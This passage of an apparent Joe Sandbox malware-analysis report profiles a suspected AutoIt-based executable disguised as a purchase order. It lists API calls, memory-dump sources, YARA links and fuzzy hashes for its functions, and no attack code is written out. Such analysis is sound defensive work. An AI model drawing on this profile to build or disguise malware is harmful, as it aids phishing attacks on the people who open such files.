                                                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 0$2
                                                            • API String ID: 93392585-3793063076
                                                            • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                            • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                            • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                            • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                            Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                            • VariantClear.OLEAUT32(?), ref: 00435320
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                            • VariantClear.OLEAUT32(?), ref: 004353B3
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                            • String ID: crts
                                                            • API String ID: 586820018-3724388283
                                                            • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                            • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                            • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                            • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                            Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,0040F545,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,004A90E8,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,?,0040F545), ref: 0041013C
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                            • _wcscat.LIBCMT ref: 0044BCAF
                                                            • _wcslen.LIBCMT ref: 0044BCBB
                                                            • _wcslen.LIBCMT ref: 0044BCD1
                                                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 2326526234-1173974218
                                                            • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                            • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                            • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                            • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                            Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                            • _wcslen.LIBCMT ref: 004335F2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                            • GetLastError.KERNEL32 ref: 0043362B
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                            • _wcsrchr.LIBCMT ref: 00433666
                                                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                            • String ID: \
                                                            • API String ID: 321622961-2967466578
                                                            • Opcode ID: 4d62cddd39e6499c0bf6f3e67d5a9631e2ea97a5f8ad0550c3b0128d52bea9a3
                                                            • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                            • Opcode Fuzzy Hash: 4d62cddd39e6499c0bf6f3e67d5a9631e2ea97a5f8ad0550c3b0128d52bea9a3
                                                            • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                            Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 769a1168dbf3b056e6a3c570e5d7bf636aa566bb12a42c52eeb89d6cb06eb2f1
                                                            • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                            • Opcode Fuzzy Hash: 769a1168dbf3b056e6a3c570e5d7bf636aa566bb12a42c52eeb89d6cb06eb2f1
                                                            • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                            Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                            • __lock.LIBCMT ref: 00417981
                                                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                            • __lock.LIBCMT ref: 004179A2
                                                            • ___addlocaleref.LIBCMT ref: 004179C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                            • String ID: KERNEL32.DLL$pI
                                                            • API String ID: 637971194-197072765
                                                            • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                            • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                            • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                            • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                            Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_malloc
                                                            • String ID:
                                                            • API String ID: 1938898002-0
                                                            • Opcode ID: 4bcc40ca92a1d17c02367a7b98f2c7558718af87d85a6ef857034364532bb056
                                                            • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                            • Opcode Fuzzy Hash: 4bcc40ca92a1d17c02367a7b98f2c7558718af87d85a6ef857034364532bb056
                                                            • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                            Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                            • _memmove.LIBCMT ref: 0044B555
                                                            • _memmove.LIBCMT ref: 0044B578
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                            • String ID:
                                                            • API String ID: 2737351978-0
                                                            • Opcode ID: d98191905aa97e4122969528db3a0c931e11f5e9452d4c2314ea804c33bdb993
                                                            • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                            • Opcode Fuzzy Hash: d98191905aa97e4122969528db3a0c931e11f5e9452d4c2314ea804c33bdb993
                                                            • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                            Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                            • __calloc_crt.LIBCMT ref: 00415246
                                                            • __getptd.LIBCMT ref: 00415253
                                                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                            • _free.LIBCMT ref: 0041529E
                                                            • __dosmaperr.LIBCMT ref: 004152A9
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 3638380555-0
                                                            • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                            • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                            Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ClearErrorInitLast
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 3207048006-625585964
                                                            • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                            • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                            • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                            • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                            Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                            • gethostbyname.WSOCK32(?), ref: 004655A6
                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                            • _memmove.LIBCMT ref: 004656CA
                                                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                            • WSACleanup.WSOCK32 ref: 00465762
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                            • String ID:
                                                            • API String ID: 2945290962-0
                                                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                            Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                            • String ID:
                                                            • API String ID: 1457242333-0
                                                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                            Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 15295421-0
                                                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                            Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
